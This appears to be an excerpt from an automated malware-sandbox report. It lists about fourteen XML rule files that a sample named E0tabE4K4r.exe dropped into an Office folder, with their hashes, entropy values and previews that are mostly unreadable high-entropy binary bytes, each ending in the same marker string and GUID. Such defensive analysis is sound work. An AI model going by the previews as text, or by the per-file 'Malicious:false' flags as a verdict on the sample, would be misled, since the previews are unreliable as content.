                                                                                                                                                  SHA-512:BA123419D143FF5D14AF7D027F89A91D80B06D6A2D625C87AF6B0403D07F48110CD7D7ABFA2359561A8055790F35C6A87700E0B3BDB78AF740198E1ECD162366
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmli.Q..$?..$..,.!....Y_\.........N.E....~8.&:.....E .?Q.......n..'...Zg.!...%...W.9..'D...mT.2..4.QE.e.P. V.{Yu...F..%....&...S...De.t[\2..r.\.I.G++...;....|R../vJl6&#"Uz.5v......%.O@..z/.8.m..&.=z.........a..e(......1`......8.^...6QK.}..;..s.....-^..;.A.....W(..."6..w.y......$R....i...|...5...#.......h.....\.....=&..xfN.;31.0*..C..".,.}E`..~M#..Y5K..%..q..(.G.E....'..S.'.....Z.j.l.>.UX.f20w'.o.|.>.a~.*.-y...?6Z^JbR..m...v..a...*z.C......A.Ar.E..... ..+.YI.....~G..._.b..jA......4}.....(..U7.'I..(.L.....B.."..z....&}.....h...=...UZ...P....Yld.Uf.-+(C..!.n...?r#..B.D.......K...$.l*z...y..........I.h....4w.T.....L.A...g..b....D"mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120612v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):804
                                                                                                                                                  Entropy (8bit):7.686692594136017
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ux5HUjsUTr0DmtB2XdlMW8CE5SioBlrrhf9JhV2bD:uTHdUTr06zOyW8CSSioLrrhf9aD
                                                                                                                                                  MD5:320C53583BEB65B796442FC24A66EB5B
                                                                                                                                                  SHA1:852354E59709E66673789D85FBC663FBFF9F99B8
                                                                                                                                                  SHA-256:BA811AB8448F7C06767BFEA88CBC63B3F0CDD84DEAE60ED065B4EE988BFC7CE9
                                                                                                                                                  SHA-512:35655A3F1ED96606B2B64CC0BE4FF671D12E0BB3910209519D4603902B51F9EB4767F73B9D4E2BD012792FE7E291395DF427291BCFC92149F8B502CE3D1488E4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlP:.$Fu..3L..cz.n..cRy..n.7..I...U..d.L.l.b ...~..r.+....8..M..."$d..E.............l.._}..2.rG/4.b.2...F.I2S'.C..5.......-.>..RgF.PO@..':d..z.G....F.4....[..V&....c.."+...7.]{u....I...U.....-.V..mx..f...(n.....l.Bx<y.d..y........Xu..I.....d.F.......P/......8.m$...R..0.....A....wc1b"..0....._.f..!.....r.IB.G.....R...o...]..].....!..2.FA1A.b.&.Xk..F...+.~[.A..] .<!..y+...X.".......7!.....^'..........@n......Z.....^....\..Q....B.@. .....FQ.j..<e......P..0EwDE\Sg}.... .~xe.!=.(L.@)..s.....Zb.d8.......U.b.4..g..K( .w.P.^R....$..~...4...wb....!lo..l#......%k...z.x..IB.Y..>.9.....................&_...P]..w........PP.....%..-.........O......O.......|.&{H+....L}..B.".[. ....bp....<:X..hs..2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120613v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):965
                                                                                                                                                  Entropy (8bit):7.7810780718821455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:jV5kEpJV2SP2yPSl6+MfWsEqLUr0cVuSSLZ4TQtD2bD:55kEnVH5SlEesEqQgc1sRwD
                                                                                                                                                  MD5:726E561E087E5944FED9B2AE9F86C204
                                                                                                                                                  SHA1:1DADD0C3EBFAEE6E1FEE5A311DC6C00E73039652
                                                                                                                                                  SHA-256:94DE7974866493D75543CE6A4A58308271C34C83EE1676338FC964ACBB22496F
                                                                                                                                                  SHA-512:2E4559975A8A33AD5FA3A6A5616033D9DF496B392ED47E1377B087A7E78EEF32964E02D9AFA984450A3FE39896AF057E530183D99892B87EBAC65EE5A3D86170
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....t...`./....H.....=!.=4.......o.#t..S<..%.nqA.#|.....<. ..M....q...,..W.$..7....[..*.....H.........W:+u)....c.......Xx..W.nY. >I.R....+D.......jS..F.O..4..]...Zk.O...[n....'$K.....zU&..}.&.ql.TP..4..H..t.[.*uy..n.....8,..?9..N.).......4.s+........U....G}v1..d[d..sBz..P......$..@..{...a........'<E8p..j!zx..PCW...t[..z.n.7.%S..t.b.W.+....5.Xyv....XXg+z...Yb=..oo...t...@5.U..)E.L.'. .UW..&.y..K....r.?-..b..5M,.K4}....l..I.oD&e-9O.I.....m....c.N:.(....].....u.8=....d`D`:E..:/EXC*j(n;.;.g...$.m>.....U...dR.U..t.EzI....(-a..;..o.u..,..u..0.t?.2.....W(...c..UP.....w...]6...A.q.....$.G..<'....,b.."F.T.....`..p...,....W.l7...3.$d..,..DCs..U......O;..{.t..bokm...Y..i.OVr...^.p.?.....jkD`.f.d7@..y....W.]a83...aP..+J...;=..R..%.......AG /b...|....GU... ...Y\[(h..s1...}.E..^!.i.D..u.y..>.i@.{..&.....>..H=....!.g..~.l}...D..,....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120614v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):800
                                                                                                                                                  Entropy (8bit):7.7193009938634765
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:eh4R0fpowTFOWDx3cf/V7g3woN6zZrp62bD:A+1wTXDaf/V79e6zZdxD
                                                                                                                                                  MD5:1FDB5C04D0C33AEC0870BD9EF1370722
                                                                                                                                                  SHA1:331BF05FE32CA7426600D0AC4D34437A38DE523F
                                                                                                                                                  SHA-256:D044FECF9DC3A56E8BF79415A48CFE1DD7B7EA8D15058808D97FDAF324AD9459
                                                                                                                                                  SHA-512:F85AC79D42C8C0EA4E958AD02865A16A7DD600153CB1BE77E50166B573F46959486B4A70BE1965FCF59383EC3BCE33B5E4A3E691D0259187CB9C967D54A4E2FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml0N.x.%SN.W..............;......u.~./fg..y...h....p.[X$...(M..A.....]..[5..tO..55X..x/}.0..a...R...i.H..G.K.L..c...j../}u..P../.)A.e..3...E.........3......p8m..q..Z.........5.b<.o..GH.N3..h..0b...h......h]."H.(b....p..N.C.....C..~..Tfp....TbN.....|....Q..J|....>......D>6.r.w...TG.<.4|d1|.]/.M%@....A...7XQma..&.8.+..|....D+...."..r%X..."f.S..{.... O.0..t.......8.0...,.0(..O..a.7;.v.b...O..{.PQ...Q_....e.r.P}..B.R.9.f....%...K.)..I.S.%.G.f.)..q....%..8r..A..iL...q.n.8..D.p....a.....g_d..g!...H..z..Kk7%......M..nS....\...h....f...c+.]..C.R6..N.]C....@@>6...... .(......?).}..k..C......wa.Z..k.w..j.*........=L...'..Fhd...n.j..aD.....u.P.1u5%..t.E...f..!......,O8.{..j,..zE.!.P....lj..~@vmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120615v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):740
                                                                                                                                                  Entropy (8bit):7.736417254717302
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:5YQ6w3lxNvHYlBDSjeBlXp0GA7AHziNdzm/wK3PeC3SToY7eSUdNcii9a:GQDlvv4ujeBOOwKfXsT7N2bD
                                                                                                                                                  MD5:B60EA1CE2950BF0F5D3870B1C826EECA
                                                                                                                                                  SHA1:52BC8F33102648C7C42E658039B64835FEE60D54
                                                                                                                                                  SHA-256:A43CF12206925F1BBED5A00BFF6CD62C0B8AF7106665997A02020383293F24F6
                                                                                                                                                  SHA-512:B1660B5ADDD1BD7C8F0620215CFBE7891D0857B9021F8D95B0AB884A487E7DC3F69EA24BAF639669E81D6F1D124CBF0FABE870EAFBD6E2B75109FFA1D2E4EF69
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml'.Y...e...._.'a.i......*y.)6J..L..x.r....r"..;........... .=U?..%.....w.>B9K...4.....?.Fp.o..3..._<...8."..d.........|u..W.U..^.m.:O.....&....$.#4....H]..M.vt.G{...y!..+%....p9.].<.....g....z.CI....]$W.|........_..*.?..x.....^......a.?.....;]b...\.k.Ft...v..4U=9...`..D.v..@H.xhm.$Z..O....0.......e}6.g.f..N....c.%.S...{!.3...n|8..b.l.'bf....3..X...6.fL..?..s.!.`..V.....Z..~8..{.CSO...Y.i.l....ZZ...........F`.....j{..C0.A...r0...Cw....>.......a'.a<.J..}.R>.\.$.X...s. .@~o.8FK.+(.?K..hf{&P#D....$4g..[.K...`g..L."7.3{...KQ2...r.x.Re....+.T....0.E.g......Fs.K.uI...zq-A..1r.#.?=]e.....KT.#-.......4.....z..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120616v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):819
                                                                                                                                                  Entropy (8bit):7.739786364589109
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:lYGMMeauz7IJLmfflnTar8OZAcaj06wpiQ5uwGPkuvvo4/uKznqFSSUdNcii9a:l1M9a842fVaQOhaj0RMMKPQUuTFh2bD
                                                                                                                                                  MD5:CCEE11B72AE3C6EC8DFC1EA64AF86EE1
                                                                                                                                                  SHA1:214AC242F9B584DFB4DC9EBCBC85716769803E0B
                                                                                                                                                  SHA-256:12ADAC573F12B75A1B2F739BF1112DCF9F4B5743C8702115C73D3741114BFD1C
                                                                                                                                                  SHA-512:A80EE260690610F89346EED625D0A7664BB69F9A4061EEB723FFE94770B36D84EC28EBB99D13EDB60E2AB6ADFCAEA81DDE1366309F1B2967E85D1B83D3C87625
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...GHg8..<.p.f........|8.....\..<l.fY..F.=.?a.E.R.&l8'.E5#.C&m....{Z.OE...n........%..Y..B.r.~{........S..u.5.b.M.......~v.WL.{..p...6.k.......'....G..H..?3.4.n.....1V PG..<....c..BW.~s..li;t.m.<]].O..n...P..rU..Fd.!'[..:[.m.R.u.....ePz.r..[......q$x.._<.s.#.I.8..<.2.Z..}....z.+..S.......1..f.(..B.~%..*..2.......5.)..p9.e..L.. ...J@....G.bk.[...w;............RG;...Bv.y....K...>... ../r`v..u.r...[..I."..$..g9....#~...).%(.U6...gc..)...]..-......:B=.<..._.&.L%+Z..,g0.f.:.*um.....R.!nF.G.B....*.q....T.l....H.+.X)m...H..,.<.r0.Sq..!...g.i.).(.R ..).=e.>...K../.\.G.i8...+....E..i...F......&.f,^K...........].IFi.+......R..m.L;...p.b3....L...R........^. ....(.y....9h.<;...&....C0.3U..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120617v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):760
                                                                                                                                                  Entropy (8bit):7.749253515861844
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:E+wz9WWNzx39RJjBjqcu8y52OTqpevXPizSCYjXmf1M5XGJc0gaHI1NOSUdNciik:szUWNF39R3jxu3MxpevXPizSF2G5X3XO
                                                                                                                                                  MD5:E7A47FFA995B26D880AE504B3B906B0B
                                                                                                                                                  SHA1:BC597FD20DFDEF1D83F6F265726B34553111D2F8
                                                                                                                                                  SHA-256:8A97CEB5E4B06091D63CE598042D759E3B6011694FF1BF6933DDCC8274554347
                                                                                                                                                  SHA-512:DC7CA9FDA6310AFEC58DAD75E16758FC74B564CB3B4882A3A332C04E70FDAE91572F4799B330A9A2B4497096AB286FFC2345223E35CA9E1C9D15D3381D9F74A7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmly..H....7R...sA..O..}....Kt;kB...,......0...~,*J#....N....I.e..y.j....,.......X...?...u.|..V...X....+j........S_..:.^.N.......k.p...].v...x.fO...v..s.Q..9....a.~...y......\......*...]....'<...J.H.Zf.}...Z.`.e..5S..&.....bB.jn.K..Nn.....=u...8...BP.......b.!....yLg..RD..>eOG&WR....|V.H..l.sjvH=w.*..........j]..oN...)4.%.F..b!8^..R..t.U/L.'_..9b.}.\w.....:.3........`.....U.......0.=..c..."9.b...R..Vo.........K. ......\e.@._.<...h.`.G..B..>&r.......F,.e.|..s....z...... .....*..!o..No.j...S.h0..s..3...V.....W..?.a..........;+...].a....'*.xy*IX.?..O.IR0yK.kk*..r\.....@.]...+hg.Z..U...!.R.|.u$4...n..+..2k7....zRc;/^....NS..%cB....w...I......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120618v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):819
                                                                                                                                                  Entropy (8bit):7.753040892501199
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:kbGMLzdPyi1AklekzXFT+vUZ4YzYRoUF2bD:IGwd6zkjRaIYGD
                                                                                                                                                  MD5:2D79361AD320C568E29FB6CE28E6A150
                                                                                                                                                  SHA1:F8F8C3709A1ACB10C680AC4463842C54657686F7
                                                                                                                                                  SHA-256:DC47B8BFB48D5401B74CBFB82B63C10726B798EC2E2E157C86EB8C5889AAE93C
                                                                                                                                                  SHA-512:99DEF1BF080C5838E014778A15141906643CCA3076DFC23074BF43E4118A3FA45DFE4402EBF450DFA6A8C2F9561EDF2085333713AA961092C0E9C696665DAC80
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.rG.............L...L...l..P..O.'...U...."v.b.oe.<.R....K.......)(gz].}..i...(..7....6(..P...'Z.Q....;,.m...........i#a........(.;/......03o..Cx[l..d-.....w......%..-...]\.W...).Py..Y..h....^.f..........u..g.-~..Iy;nO.dK..k...Xn.(.5.9pB...W.....%?X[6'.b.....u.8* ~.<.....|.R.qk.F.4.%Q...H..{G..\OH...`*..:..vrs{..;.3h..8...T..D.O@.v1..4x.....2..O.o.mU.Tav6..n.c.U.........5....eO7.U........I..'...N.....z..&......kO.g..5...........j..c..!.lt.......WlE. /s....x.....NXd.e_...R..:(y.!L.}.r.R.5..Y..)..E..).z.fKY_..`.....w...f.Q ... .:...{v.3....7...../..T$C.&R..0t..C.].e........p...G...F.......G.\.1...)..'....Av{...x..9.....QM....S!c......ppst.H........#.t.6...KX....7..7." ........R\.......gk.8mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120619v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):740
                                                                                                                                                  Entropy (8bit):7.692782420538429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:W17URrSrV2b+5DvE5FqUqV6a46hCVSXAggY3CQMfd2+M0RD2DhHBTiupPAySUdNX:W174SpDc5FoZ4OCVSwJsCVjehHBTTpIy
                                                                                                                                                  MD5:CA7CFF459340A56108F38BE3146AF4CC
                                                                                                                                                  SHA1:9491E0BEDC2CE918F2E4F22E0AFD491B66377335
                                                                                                                                                  SHA-256:1FC8B5E84901CF80B146E81B1A4C8ADBC669218D61FA1E1F6416960BBF0C6DA5
                                                                                                                                                  SHA-512:9A3766328B516FEECB37CA47B61C22122BFBA0FB83B5549F9A127C0B7455D8BBED71B4E12C40BA57633D2037405EBFDBB2FBE0DD06679BB5AA89C3126E7CE258
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml\.U....40.._t.&....O.}...-.D@ .<O-.X....u.I.8U.aPih<....L.G...z.;..bu..-.....].n....z.@.j....T.....CF..]...D..pR......;.....MK....F.IM...R.....o.Xi.V..(.G.4......r....}.s... ...3.qJ....O.O...S.....V3...h.H........W.....h..:........O..Q.....j.syTZpT..G.X%O......r.q..J....V..|..... ..A*...34..R].syP...!.0.R.7.......;Li....{..ql'.\u..i..d<M.B"._.Y....%9.Cx4pV.=`.JL5.uJ.=....q......f,1J.jW..`+...ms...I.?5.}.?1..Yr".....p`....Wb.~..........\....v....E..0..<._0......B...FO...F.n.a$.i.e1$..H.U......>zu|u..ZS:D.....W.\.z(..[./.Z./.C........3.......~..T....8$% R. ..p...}1:y"....^;..Ey.........)..6.j.e...b..e.IMv.F.....I...c*kO.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120620v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):802
                                                                                                                                                  Entropy (8bit):7.719476054062594
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:9ynLPXNCyp4rbmOxIZEyF6MbOcZ7UUjXYn8KDhJSsP+k89/0FV+Xr1aXjSUdNciD:QnIyObdxS6hgQUjQLDhcsPEx0OBku2bD
                                                                                                                                                  MD5:D55776F5A3D5EFF2D87E9A9FD297F6F5
                                                                                                                                                  SHA1:08B98DA45B02DB7C9660CBD45852E0932D5978EB
                                                                                                                                                  SHA-256:EAF568C6EACD69B25E36F3F3C93C9B7F05ED840FB54532AA0E2A1C48DDC79669
                                                                                                                                                  SHA-512:56F3DD39497EB0034760C8F3F8653A49D2E107BF910C8A99ED6A024056981BDCB90D1E7B36F53D1F52AAA19E2C203F994667FB4A1AECDF8AB5A55EB1B561D7CA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlo.P...U"..Cr\.l~L....=..y.T......y6.V`..C....A>..N.IT....z4......'S.sP.P..3....F.P,..-..K).j.YrcNK..z.1.|..d..T...5i.r.YvG7...P(..f..3.4k...Q....{9..X.t.?...h.#.J..@.sOD.UD../...I.......F..M.t.-ukaL..Cxq...e.=...A.x5..3E."p...Bz.....(.....8qL(:3gu.wO...1[..fZ.6.`[)q...!.*[.yI....O)..&.A...#e..Tr...).t'.6.>0.XV^........p....z..m...X,..~m.N......QE..I.......u:...I......u..H..=..O..7k.v..........k..e.{:3..e...).>....v"Y)L!...~R.,...3...EX'.......W.o.Y......Z..^xt.`@...*Q......!}...>[M!..T..N..1[7Z6T.....1..`.*.w..|D...>a..L...)..V.... }.b...#.H.u....2M-...b..^....9.s.....J.....).d..B...../..L08H..a/....d.E...j..6h.7.8.\...+.D.YUg.d.....h9RI..A.U..w..6.NH.A...4K......Wrd'k_...N.......}mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120621v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):748
                                                                                                                                                  Entropy (8bit):7.712316151043268
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:NJJk2LS7aSouhWSIkjz1c55tMsN5wLn2E5WPBb6oOlNIE5xZvovneNQkt010SUdV:Fk2oKSI2Zg9bg2E5K6oh+xZdD01r2bD
                                                                                                                                                  MD5:904C36911A452490AA6C42DEC4A2F2BF
                                                                                                                                                  SHA1:7E82C829B12FCDF2061D0092478C889CAF15AB38
                                                                                                                                                  SHA-256:3792C41153EFC812E238C2A19C15051A1FBCA3EFF765E9BD58FC8CFC3BBFC603
                                                                                                                                                  SHA-512:D2AA538AF2AF7AA03295D20C375FAF8F1FD9FD6216D2810D9EDAEC1598927EC70F1A2F470B7B9EC8BE220AE39E7630CA4E8B274F86DA7A93365587B46C9452CE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml2...[.3@ +..C.E<I..+....Y}.M0....}Bd.....l..x.....N).(3...{xs`.{...yM..B.....U.D8......l..{.T.W....+ ...W....%....x*..zm .......S....&v......9./{g..gB.n....}.+.s..+9.7......%......4...@.^!.j..4?u,-.v...c..>...;....:.n...,.um.I..5...Ji.....1m.b.h.L.u..q.v\>f..a/FZe.L.3E.k.....q........I...... ..K.H.RC........,....H ..f......=...6!6.K.[.L("..gE..V.7..........X....O.t ......m^/.n...g..j.Z.zL.N..R..BZ.-d....e....MS..=L.q1.9..........$...D.`....P...(..Hz ..$..J....M"#'..KTk..#$.r..SLK..n.Z..6.f..Y.&T7..&....&..!.6 .....%..u5}..m...lb.."r.)^c...t,.@..@6L....3.L.w...c."3c.....v....0..H\..{}.....Fhl.V&.<...5.......c>....".....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120622v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):810
                                                                                                                                                  Entropy (8bit):7.708529162263315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:K9xAZ6V4+lmmPH6nUagsG7bh9l1u6EJngnU5KXZsqjFeLohmiQ5LeffskMSUdNcq:IxAkV4emud99l1cn1Kp5FRhgtaJ2bD
                                                                                                                                                  MD5:8D20BB837D45945065FF56A5FF2B24A7
                                                                                                                                                  SHA1:F609B4BDC274E9E2295D2EEE5E26BF57F06C61A9
                                                                                                                                                  SHA-256:E1831E0A79F23D0BC9F421FBFD4F673CFA42DE00BD24DA75D88591E015527705
                                                                                                                                                  SHA-512:2421AD10694D146F6268670D83F76DEA9F236635F982A4952DE24A18CB9B67BA30C6C4B053CA541A0CE8B2A0B55C0EBE2430855926D4AB192C1EDD44E2243408
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlT..n.JaR.E..W.9.Z.^.!f2..j/.iz..R.z......d.lQ....M.2..:...).......&l..D........vU..S.v.......0r.g..X.U....v.~i..">.Fs.......:?.)..6....!..,'.)z"}....f.&..y6a.r.1?$...l....".....md.6.K......{./.'+.l.......4..t.>.S....x..:.|.b...%........1.8.y..7..q.M...p'.....D...X.{2.<..+I.4.....}.........U.N.`.6.&r.}..v.......l..6k?.d....e~./o:(\.jS......0..Y.c.U.....h:.."..@....M"[..P..XXi.n5.d9...nUg..V..o...,..?8o....RM........`.hK!..3;t.".D.#.]WC...q./..P..TEc...}."..7..yk.....jEQ...]..RB......M.#..r.pI0...H..\.8>F..N.a[z.p.....^Gfw"Egx..e..PF.@..|..N[...8..$....o@5....JG...I..2...>3....4L(.e..#NJ........77....K|`...9p.S......S..+7...S.|...pAW.V....Uh..fI..8...k.....C.Qh....H...:...N?..1.m:...'.tUmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120623v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):797
                                                                                                                                                  Entropy (8bit):7.727881933431981
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2K4LnXW0U3+WLrETJOFiUeeTlfOvG+ojnRAV2bD:2KwmoQrEVOgUelvPGHD
                                                                                                                                                  MD5:C6143DBB467D5051AB08CCC2160A868F
                                                                                                                                                  SHA1:12312C3712970E9136CE572064457469D73CA1B5
                                                                                                                                                  SHA-256:6ED0C5B6C5123609CB1FF09D113960D77B6EC99DB5E90FA2A56A1C9D76372BEF
                                                                                                                                                  SHA-512:43BFCE38AD86CB095A92523B7770220FD5D0EC11D0E1E1042FF040D251D434B1E58A98CD01F97BD625B9285B2026EDBCA5012CCB081D8A3EF3D1124DA458305D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..\Q......E. .e.)q....z..~...........M...B.....M......h.A_`68...[.C...u.z."O..Z?s.......K......8..T..a.R.....E...[....eQ.K.9..^8...K{4.....kN..*....y.k...\^..M..."hq...Vf.^.k.W....V....cV..&.L|...=.s.~.._].5f..>;..mnow......Ok..C...3......T|.......s.+oH.YA.|........)..:..c.4.&v....R..W.V.t.K....g)...z.......|...n.5..p.Ud.?..... .1:h1Q!.;8.|&FIc!...t.4%..ug.U..r|..nf.".p.z.....A...)..FCH.-<.-)9..P.......&f.h.......FN5Hr-ls.F.../.....B.U.o.T..d..|.'.F.3.Z...Npds.?B......\.."v*m.8...... ..a.2.^...5.$..q..H..TJ.....V.y..S6.!>.k.#=\.......Eu5...K]..P.6..%..B.0i.y...r.74.ZEM/.....3/}.\5....b(..c....`...]..".`....'...-.....v@.92......F^a..b.q.%$|.12.g.....oU$..|_.D*Eo.<.....vr.T...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120624v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):827
                                                                                                                                                  Entropy (8bit):7.717783006787432
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yjB6ck6sZAaFK7hsNKQ64FPt94zElQ5YwG3WTIOkCj2bD:4MEaYGy4v9ApAmTIQQD
                                                                                                                                                  MD5:D65CD42EC5D23ADE6A4C12F6E8961E07
                                                                                                                                                  SHA1:EC575353CBF60E2040B96CB4CFAECD90B33D28CC
                                                                                                                                                  SHA-256:E4E5541B147E2D30A33057D561374444F9379432533DC3649ECE69CD8A6C273E
                                                                                                                                                  SHA-512:F8EBBA00C8FE2CA5B9F1C404347817D12A0E88E550EF2026BA6A8365376C3B213F1538C00A3B1CAE3610CBECFF7C4F68B6437C56FACC89934DB609C618E2095D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.+...qY.-....<u.a..h...p..a..........`)x..y.j|.9.DPL).r.-_......._.r.&G..-Z.?..B.rdp...:+|...5...&.#.(.F....\..$~...9^.....q....%.X<d.U....J.0..9V/."..z.+......M.P.0\...`.+.....*.0........1..z.^~m..&7Z0..]o.BU.1..V.~....v.;.y"...G.T..}..!..V^..q...R..".IV.._PxI..U..P...8....?)H....-M...2f...<.U4[.H.CN..}..'.u.s..c.].[..~..N....w.L.\&.J'..H...9.......a5....B.[..x.#..C.....d.u..K.F+.nI@..+......$:.V..l\..x.R.&..3.?.#!.7A......d.3.P....... k."..iIJ..dPi..;...$#U..U..FN.b|....K..g........>.....8..}..J4....4oi.~.3.M ...... ...,l.xhd#...).^....-.tx..WnbW...S...DO.l..M7.V..Jt4..P..JF..........N.M.p...=B.....x.....:.6e..xpV..6._O.2...f.u..&.HA#X..-shJ..(R..uOS.1.c6.._.....@.LtG.6.."...t...~6{..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120625v0.xml

                                                                                                                                                  Download File
